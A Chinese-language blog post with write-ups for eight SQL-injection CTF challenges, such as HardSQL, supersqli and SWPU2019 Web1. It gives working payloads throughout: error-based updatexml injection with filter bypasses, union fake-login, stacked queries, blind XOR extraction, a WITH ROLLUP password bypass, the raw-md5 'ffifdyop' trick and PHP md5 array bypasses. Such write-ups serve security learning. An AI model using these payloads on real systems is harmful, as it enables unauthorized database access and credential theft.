CTF-SQL

目录

1、极客大挑战 2019]HardSQL

2、[GXYCTF2019]BabySQli

3、supersqli

4、[RCTF2015]EasySQL 

5、[CISCN2019 华北赛区 Day2 Web1]Hack World 

6、ctf.show_web10

7、[BJDCTF2020]Easy MD5

8、[SWPU2019]Web1


1、极客大挑战 2019]HardSQL

很多东都被过滤了,无法绕过,用字典扫一下发现left,right,select,updataxml,extractvalue可以用:

 

 而且有显示报错信息,所以用报错注入,单引号闭合:

 空格被过滤了用()代替,and用^代替,=用like代替:

表名:

1'^updatexml(1,concat(0x7e,((select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database()))),0x7e),1)#

 列名:

1'^updatexml(1,concat(0x7e,((select(group_concat(column_name))from(information_schema.columns)where(table_name)like'H4rDsq1')),0x7e),1)#

字段内容:

1'^updatexml(1,concat(0x7e,(select(group_concat(password))from(H4rDsq1)),0x7e),1)#

 报错注入内容显示不完全最多显示30,我们用right显示后边的内容拼接起来:

1'^updatexml(1,concat(0x7e,(select(right(password,30))from(H4rDsq1)),0x7e),1)#

right和group_concat可以一起使用: 

1'^updatexml(1,concat(0x7e,(select(right(group_concat(password),30))from(H4rDsq1)),0x7e),1)#

2、[GXYCTF2019]BabySQli

先查字段,字段为3推测是id,uers,passwd,然后利用联合查询生成虚拟数据登录,注意密码要md5值,但是这个用户名要存在才行,用户名可以用字典试试,但是这里admin很明显:

name=1' union select 1,'admin','202cb962ac59075b964b07152d234b70'# &pw=123

3、supersqli

select被过滤:

报错注入查看数据库名。

堆叠注入+预编译

查看表名:id=1’;ues 数据库名;show tables;--+

查看列名:id=1’;use 数据库名;show columns from `表名`;#

查看字段内容:id=1';set @sql = CONCAT('sele','ct * from `表名`;');prepare aaa from @sql;EXECUTE aaa;#

Handler:

handler table_name open打开一张表
handel table_name read first读取第一行内容,
handel table_name read next依次获取其它行

handler `表名` open;handler `表名` read first;#

4、[RCTF2015]EasySQL 

二次注入当注册用户后面是双引号时,修改密码会报错,所以是双引号闭合。有报错就用报错注入,把注入语句注册成为用户名,然后点击修改密码就可以执行报错注入。

最终得到flag有两个难题:一个是里面字段数太多,报错注入显示的字符有限,所以用regexp(’^f’)将f开头的进行匹配。第二个是:flag的长度也超了,但是mid,left,right,substr函数都被禁用了,所以用reverse反转函数输出后面的flag。

空格和and被过滤了,用&&,||和括号绕过

1"||(updatexml(1,(select(real_flag_1s_here)from(users)where(real_flag_1s_here)regexp('^f')),1))#

 

 1"||(updatexml(1,concat('~',reverse((select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('^f')))),1))#

 把后面的反转一下拼接起来就行了。

5、[CISCN2019 华北赛区 Day2 Web1]Hack World 

 用盲注,没有报错信息,一个一个的试闭合,and 和or被过滤了用异或,发现:

1^1^1

显示正常

1^0^1

显示错误

知道表名和列名直接盲注,不要用gruop_concat因为被过滤了:

payload="1^(ascii(substr((select(flag)from(flag)),%d,1))>%d)^1"%(i,tmp)

6、ctf.show_web10

 源码:




<?php
		$flag="";
        function replaceSpecialChar($strParam){
             $regex = "/(select|from|where|join|sleep|and|\s|union|,)/i";
             return preg_replace($regex,"",$strParam);
        }
        if (!$con)
        {
            die('Could not connect: ' . mysqli_error());
        }
		if(strlen($username)!=strlen(replaceSpecialChar($username))){
			die("sql inject error");
		}
		if(strlen($password)!=strlen(replaceSpecialChar($password))){
			die("sql inject error");
		}
		$sql="select * from user where username = '$username'";
		$result=mysqli_query($con,$sql);
			if(mysqli_num_rows($result)>0){
					while($row=mysqli_fetch_assoc($result)){
						if($password==$row['password']){
							echo "登陆成功<br>";
							echo $flag;
						}

					 }
			}
    ?>

源码中先根据用户名查询用户信息, 用户名通过以后, 再判断密码是否相同, 我们绕过用户名的过滤条件, 在使用 with rollup注入绕过密码。

with rollup 可以对 group by 分组结果再次进行分组,并在最后添加一行数据用于展示结果( 对group by未指定的字段进行求和汇总, 而group by指定的分组字段则用null占位)

我们使用万能用户名 a'/**/or/**/true/**/# 使SQL成立绕过用户名之后, 后台的SQL会查询出所有的用户信息, 然后依次判断查询处的用户名对应的密码和我们输入的密码是否相同, 这时候我们使用with rollup 对 group by 分组的结果再次进行求和统计, 由于with rollup 不会对group by 分组的字段( password)进行统计, 所以会在返回结果的最后一行用null来填充password, 这样一来我们的返回结果中就有了一个值为null的password , 只要我们登录的时候password输入框什么都不输, 那我么输入的password的值就是null, 跟查询出的用户密码相同( null == null), 从而登录成功

'/**/or/**/1=1/**/group/**/by/**/password/**/with/**/rollup#

7、[BJDCTF2020]Easy MD5

select * from 'admin' where password=md5($pass,true)

md5里面的值转换后变成:

select * from 'admin' where password='xxxxxxxx'

我们需要构造引号里面的值为:'or'xxxxx,'or'对应的16进制是 276f7227,在'or'后面还应该有一个数字,不然语句就为假。

最终找到:ffifdyop
md5值为:276f722736c95d99e921722cf9ed621c
组成的语句就是:

select * from 'admin' where password='or'6xxxxxxx'

 登录进去就是一个md5弱类型比较,数组绕过:

<!--
$a = $GET['a'];
$b = $_GET['b'];

if($a != $b && md5($a) == md5($b)){
    // wow, glzjin wants a girl friend.
-->
a[]=1&b[]=2

然后又进入: 

 <?php
error_reporting(0);
include "flag.php";

highlight_file(__FILE__);

if($_POST['param1']!==$_POST['param2']&&md5($_POST['param1'])===md5($_POST['param2'])){
    echo $flag;
} 

还是数组绕过:

param1[]=1&param2[]=2

8、[SWPU2019]Web1

注入点在广告标题那里,单引号闭合,过滤了注释使用 '1闭合后面:

order被禁了用group by 代替order by ,空格用/**/,union select 可以用。字段为22

1'/**/union/**/select/**/1,database(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'

 information_schema.被过滤,绕过:

mysql.innodb_table_stats
sys.schema_auto_increment_columns
1'/**/union/**/select/**/1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/from/**/mysql.innodb_table_stats/**/where/**/database_name="web1"'

爆列显示:

 无列名爆字段内容:

-1'union/**/select/**/1, (select/**/group_concat(b)/**/from(select/**/1,2,3/**/as/**/b/**/union/**/select*from/**/users)x),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'

把字段1,2,3的内容都给字段b,再传给字段2。

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

T1M@

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值